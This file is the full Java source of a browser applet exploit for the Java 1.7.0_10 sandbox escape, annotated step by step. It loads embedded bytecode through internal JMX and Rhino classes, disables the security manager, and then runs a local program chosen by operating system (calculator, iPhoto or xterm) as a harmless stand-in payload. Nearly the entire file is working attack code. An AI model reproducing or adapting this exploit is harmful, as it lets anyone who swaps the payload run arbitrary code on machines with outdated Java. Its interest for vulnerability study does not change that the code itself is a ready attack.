/*
   Java 0day 1.7.0_10 decrypted source
   Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
   From Russia with love.
   */

import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.applet.Applet;

@SuppressWarnings({ "restriction" })
public class Exploit extends Applet {

    public static byte[] hex2Byte(String paramString) {
        byte[] arrayOfByte = new byte[paramString.length() / 2];
        for (int i = 0; i < arrayOfByte.length; i++) {
            arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
        }
        return arrayOfByte;
    }

    public static byte[] B$class_bytes = hex2Byte("CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017");

    // Decompilation credit to benmmurphy
    // http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
    // basically, it's this, as if this were compiled and saved on disk.
    static class B implements PrivilegedExceptionAction<Object> {
        public B() {
            try {
                AccessController.doPrivileged(this);
            } catch (Exception e) {
            }
        }

        public Object run() {
            // This basically removes the security manager
            System.setSecurityManager(null);
            return new Object();
        }
    }

    @SuppressWarnings("rawtypes")
    public void init() {

        try {
            // ================================================================
            // STEP 0: get introspection objects

            // Conveniences
            ClassLoader null_ClassLoader = null;
            Object[] _zero_args_ = {};

            // "Returns a lookup object which is trusted minimally.
            // It can only be used to create method handles to publicly
            // accessible fields and methods."
            MethodHandles.Lookup lookup = MethodHandles.publicLookup();

            // Used to load the "sun.org.mozilla.javascript.internal.*" classes
            // Looks like these classes load some normally inaccessible
            // libraries. Can't find any good documentation on them.
            MBeanInstantiator localMBeanInstantiator = ((JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("",
                        null, null)).getMBeanInstantiator();

            // Used to invoke reflection on the javascript classes
            // method type: MethodHandle <method> (Class, String, MethodType)
            MethodType mt_MethodHandle__Class_String_MethodType = MethodType.methodType(MethodHandle.class,
                    Class.class, new Class[] { String.class, MethodType.class });

            // MethodHandles.Lookup.findVirtual(Class, String, MethodType)
            MethodHandle MethodHandles$Lookup$findVirtual = lookup.findVirtual(MethodHandles.Lookup.class,
                    "findVirtual", mt_MethodHandle__Class_String_MethodType);

            // method type: MethodHandle <method> (Class, MethodType)
            MethodType mt_MethodHandle__Class_MethodType = MethodType.methodType(MethodHandle.class, Class.class,
                    new Class[] { MethodType.class });

            // MethodHandles.Lookup.findConstructor(Class, MethodType)
            MethodHandle MethodHandles$Lookup$findConstructor = lookup.findVirtual(MethodHandles.Lookup.class,
                    "findConstructor", mt_MethodHandle__Class_MethodType);

            // ================================================================
            // STEP 1: Load the GeneratedClassLoader interface that declares a
            // public
            // "defineClass" method so we can take our bytes and turn it into a
            // live Java Class.
            Class GeneratedClassLoader$class = localMBeanInstantiator.findClass(
                    "sun.org.mozilla.javascript.internal.GeneratedClassLoader", null_ClassLoader);

            // ================================================================
            // STEP 2: Create a Javascript "Context" to get a reference to a
            // Javascript GeneratedClassLoader via
            // "Context.createClassLoader(ClassLoader)".
            Class Context$class = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context",
                    null_ClassLoader);
            MethodType mt_Void__Void = MethodType.methodType(Void.TYPE);
            MethodHandle Context$Context = (MethodHandle) MethodHandles$Lookup$findConstructor
                .invokeWithArguments(new Object[] { lookup, Context$class, mt_Void__Void });
            Object jsContext = Context$Context.invokeWithArguments(_zero_args_);

            // ================================================================
            // STEP 3: Create a GeneratedClassLoader object.
            MethodType mt_GeneratedClassLoader__ClassLoader = MethodType.methodType(GeneratedClassLoader$class,
                    ClassLoader.class);
            MethodHandle Context$createClassLoader = (MethodHandle) MethodHandles$Lookup$findVirtual
                .invokeWithArguments(new Object[] { lookup, Context$class, "createClassLoader",
                    mt_GeneratedClassLoader__ClassLoader });
            Object generatedClassLoader = Context$createClassLoader
                .invokeWithArguments(new Object[] { jsContext, null });

            // ================================================================
            // STEP 4: Define the class "B" - the bytes "B$class_bytes" is
            // basically what you would get "on disk" if you compiled the "B"
            // class.
            MethodType mt_Class__String_bytearray = MethodType.methodType(Class.class, String.class,
                    new Class[] { byte[].class });
            MethodHandle GeneratedClassLoader$defineClass = (MethodHandle) MethodHandles$Lookup$findVirtual
                .invokeWithArguments(new Object[] { lookup, GeneratedClassLoader$class, "defineClass",
                    mt_Class__String_bytearray });
            Class B$class = (Class) GeneratedClassLoader$defineClass.invokeWithArguments(new Object[] {
                generatedClassLoader, null, B$class_bytes });

            // ================================================================
            // STEP 5: Create a new "B" object, which disables the security manager in it's constructor
            B$class.newInstance();

            // ================================================================
            // PROFIT!!!1!
            Runtime.getRuntime().exec(findOsDepProgram());

        } catch (Throwable ex) {
        }
    }

    private String findOsDepProgram(){

        String os = System.getProperty("os.name").toLowerCase();

        if( os.indexOf("windows") != -1 ){
            // If I was a cruel hacker, powershell would open
            // doing an 'ls' hogging your system for 4 minutes
            return "calc.exe";
        }else if( os.indexOf("mac") != -1 ){
            // A truly evil hacker I would open iTunes
            return "/Applications/iPhoto.app/iPhoto";
        }else{
            // Assume real OS
            return "xterm";
        }
    }

}